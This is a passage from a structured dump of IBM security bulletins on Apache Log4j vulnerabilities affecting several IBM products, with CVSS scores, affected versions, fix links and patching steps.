IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server. 
\n \n## Workarounds and Mitigations\n\n**Redhat Openshift Platform**\n\nNone.\n\n**Traditional On Premise**\n\nNone except as described in the individual on premise component security bulletins in the Remediation/Fixes table above.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTPTP\",\"label\":\"Netcool Operations Insight\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.6.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T10:51:19", "type": "ibm", "title": "Security Bulletin: Netcool Operations Insight is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", 
"CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-09T10:51:19", "id": "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "href": "https://www.ibm.com/support/pages/node/6554808", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:21", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus Build 446| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \nIBM Sterling Secure Proxy| 6.0.2.0| iFix 04 Plus Build 232| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 6.0.3.0| iFix 01 Plus Build 142| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link also points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. 
This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:05:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling Secure Proxy (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:05:15", "id": "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "href": "https://www.ibm.com/support/pages/node/6538674", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:08", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by the IBM Engineering Lifecycle Management products for logging . The fix includes upgrade to Apache log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. 
By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM Engineering Lifecycle Management products (IBM Jazz Team Server based Applications) are affected: Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management (ETM), Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG).\n\nPlease find the affected components and remediations for each affected product and version in the table below. \n\n\n**Version(s)**| **Affected Product(s)**| **Remediation (Refer to the Step number in the Remediation Section) \n** \n---|---|--- \n6.0.6| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n6.0.6.1| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n7.0| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| | 
\nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.1| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| #3| \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.2| Engineering Lifecycle Management (ELM)| | | #3| \nIBM Engineering Requirements Management DOORS Next(DNG)| #1| | | \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin. \n**\n\nNote: This Bulletin Supersedes Bulletin: <https://www.ibm.com/support/pages/node/6527732>\n\nNote: If you integrate any of the IBM Jazz Team Server-based products and versions (6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2) listed above with IBM WebSphere Application Server (WAS) you will want to review the IBM WebSphere Application Server (WAS) remediation [guidance](<https://www.ibm.com/support/pages/node/6538722> \"guidance\" ).\n\n1 - For **IBM Engineering Requirements Management DOORS Next (DNG)** Version 7.0.2 only. Click this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS+Next&release=7.0.2&platform=All&function=fixId&fixids=7.0.2-IBM-ELM-iFix010&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to install iFix010 or newer. 
Note: if you have previously installed the log4j patch patch_Log4Shell_DNv4.zip you will need to remove it first. Follow the instructions in the iFix for steps on how to remove patches.\n\n2 - The Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Requirements Management DOORS Next (DOORS Next), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management, Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG)** versions **6.0.6, 6.0.6.1, 7.0, 7.0.1** will need to be updated. Follow this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-CLM-ELM&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Link\" ) and apply the remediation.\n\n3 - If the **Engineering Lifecycle Management (ELM)** optional component **mxbean-datacollection (ELMMon)** has been installed for version 7.0.1 or 7.0.2 it will need to be updated. Click this [link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=All&platform=All&function=fixId&fixids=MXBean-DataCollection-V2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"link\" ) and follow the instructions to remediate.\n\n4 - **IBM Jazz Reporting Service (JRS)** versions 6.0.6, 6.0.6.1 included an optional technology preview of the property graph solution (<https://jazz.net/pub/new-noteworthy/jrs/6.0.6/6.0.6/index.html#1>). 
This technology preview is impacted. The workaround is to uninstall both the Apache Cassandra - LQE Technology Preview and Elastic Search - LQE Technology Preview components of IBM Jazz Reporting Service. In IBM Installation Manager (IIM), modify packages to uninstall these components.\n\n## Workarounds and Mitigations\n\n[None](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&\\[%E2%80%A6\\]ion&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"None\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSPRJQ\",\"label\":\"IBM Engineering Lifecycle Management Base\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSR27Q\",\"label\":\"Rational Quality Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6, 6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJJ9R\",\"label\":\"Rational DOORS Next Generation\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSRPNG\",\"label\":\"Global Configuration Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6, 6.0.6.1, 7.0, 7.0.1, 
7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVLZ\",\"label\":\"IBM Engineering Requirements Management DOORS Next\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYMRC\",\"label\":\"Rational Collaborative Lifecycle Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6-7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUC3U\",\"label\":\"IBM Engineering Workflow Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVV6\",\"label\":\"IBM Engineering Test Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCP65\",\"label\":\"Rational Team 
Concert\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVLZ\",\"label\":\"IBM Engineering Requirements Management DOORS Next\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0,7.0.1,7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T19:58:40", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Management products are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", 
"CVE-2021-45105"], "modified": "2022-01-28T19:58:40", "id": "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "href": "https://www.ibm.com/support/pages/node/6540016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:09", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which affect the Knowledge Center Component (KCCI) which may optionally be installed by IBM Engineering Requirements Management DOORS. This fix upgrades the Knowlege Center component to a version that does not rely on or use Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Requirements Management DOORS| 9.6.1.7-9.6.1.11, 9.7-9.7.0.1, 9.7.1, 9.7.2-9.7.2.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nNote: This security bulletin supersedes: <https://www.ibm.com/support/pages/node/6527328> \n\n\nThe Knowledge Center Component (KCCI) for a Locally installed Help Server that is (optionally) installed and configured for the following products will need to be updated: \n\n * IBM Engineering Requirements Management DOORS: 9.6.1.7 - 9.6.1.11\n * IBM Engineering Requirements Management DOORS: 9.7 - 9.7.0.1\n * IBM Engineering Requirements Management DOORS: 9.7.1\n * IBM Engineering Requirements Management DOORS: 9.7.2 - 9.7.2.2\n\n \n \n**Remediation/Fixes** \n\n\nClick the [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to download the patch. Follow the following procedure to remediate. \n \n\n\n \n**Procedure:**\n\n \n1\\. Download the updated IBM Engineering Requirements Management DOORS Server Windows installer \nfrom the link identified above. \n2\\. Unzip the file and install the server setup.exe on a temporary Windows machine. \n3\\. Find the updated KC_CI.zip that is a part of the temporary install \n\\- Temp Location : \n\n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\9.7.2.5\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n4\\. 
